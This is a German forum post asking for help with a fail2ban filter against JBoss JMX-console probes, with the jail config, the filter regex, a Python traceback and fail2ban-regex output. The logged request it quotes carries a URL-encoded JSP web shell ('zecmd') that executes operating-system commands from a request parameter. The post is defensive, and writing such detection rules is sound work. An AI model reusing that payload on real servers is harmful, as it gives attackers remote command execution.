Hallo zusammen,
ich kämpfe seit einigen Tagen mit einer Regex für fail2ban..
die Log Zeile für die Regex würde so aussehen:
ich hätte dafür folgendes angepasst:
jail.local:
Filter:
leider startet fail2ban nicht mehr, sobald ich den Filter aktiviere:
soweit ich die Ausgabe von fail2ban-regex verstehe, sollte die Regex doch passen - oder übersehe ich hier noch etwas?
Hättet ihr einen Tipp?
bG
ich kämpfe seit einigen Tagen mit einer Regex für fail2ban..
die Log Zeile für die Regex würde so aussehen:
Code:
IP - - [26/Dec/2013:03:46:46 +0100] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=zecmd.war&argType=java.lang.String&arg1=zecmd&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True HTTP/1.0" 404 - "-" "-"
ich hätte dafür folgendes angepasst:
jail.local:
Code:
enabled = true
filter = apache-badwords
action = iptables-multiport-log[name=apache-badwords, port="80,443", protocol=tcp]
logpath = /var/log/httpd/*log
maxretry = 1
Filter:
Code:
# Fail2Ban configuration file
# Option: failregex
# Notes.: regex to match the password failure messages in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching.
failregex = ^<HOST> -.*"HEAD /jmx-console/HtmlAdaptor
ignoreregex =
leider startet fail2ban nicht mehr, sobald ich den Filter aktiviere:
Code:
Starting fail2ban: Traceback (most recent call last):
File "/usr/bin/fail2ban-client", line 404, in <module>
if client.start(sys.argv):
File "/usr/bin/fail2ban-client", line 373, in start
return self.__processCommand(args)
File "/usr/bin/fail2ban-client", line 183, in __processCommand
ret = self.__readConfig()
File "/usr/bin/fail2ban-client", line 378, in __readConfig
ret = self.__configurator.getOptions()
File "/usr/share/fail2ban/client/configurator.py", line 68, in getOptions
return self.__jails.getOptions(jail)
File "/usr/share/fail2ban/client/jailsreader.py", line 67, in getOptions
ret = jail.getOptions()
File "/usr/share/fail2ban/client/jailreader.py", line 79, in getOptions
ret = self.__filter.read()
File "/usr/share/fail2ban/client/filterreader.py", line 56, in read
return ConfigReader.read(self, "filter.d/" + self.__file)
File "/usr/share/fail2ban/client/configreader.py", line 62, in read
SafeConfigParserWithIncludes.read(self, [bConf, bLocal])
File "/usr/share/fail2ban/client/configparserinc.py", line 108, in read
fileNamesFull += SafeConfigParserWithIncludes.getIncludes(filename)
File "/usr/share/fail2ban/client/configparserinc.py", line 79, in getIncludes
parser.read(resource)
File "/usr/lib64/python2.6/ConfigParser.py", line 286, in read
self._read(fp, filename)
File "/usr/lib64/python2.6/ConfigParser.py", line 482, in _read
raise MissingSectionHeaderError(fpname, lineno, line)
ConfigParser.MissingSectionHeaderError: File contains no section headers.
file: /etc/fail2ban/filter.d/apache-badwords.conf, line: 10
'failregex = ^<HOST> -.*"HEAD /jmx-console/HtmlAdaptor\n'
soweit ich die Ausgabe von fail2ban-regex verstehe, sollte die Regex doch passen - oder übersehe ich hier noch etwas?
Code:
fail2ban-regex 'IP - - [26/Dec/2013:03:46:46 +0100] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin HTTP/1.0" 404 - "-" "-"' '^<HOST> -.*"HEAD /jmx-console/HtmlAdaptor'
Running tests
=============
Use regex line : ^<HOST> -.*"HEAD /jmx-console/HtmlAdaptor
Use single line: IP - - [22/Dec/2013:03:46:46 +0100] "H...
Results
=======
Failregex: 1 total
|- #) [# of hits] regular expression
| 1) [1] ^<HOST> -.*"HEAD /jmx-console/HtmlAdaptor
`-
Ignoreregex: 0 total
Summary
=======
Addresses found:
[1]
IP (Sun Dec 26 03:46:46 2013)
Date template hits:
2 hit(s): Day/MONTH/Year:Hour:Minute:Second
Success, the total number of match is 1
However, look at the above section 'Running tests' which could contain important
information.
Hättet ihr einen Tipp?
bG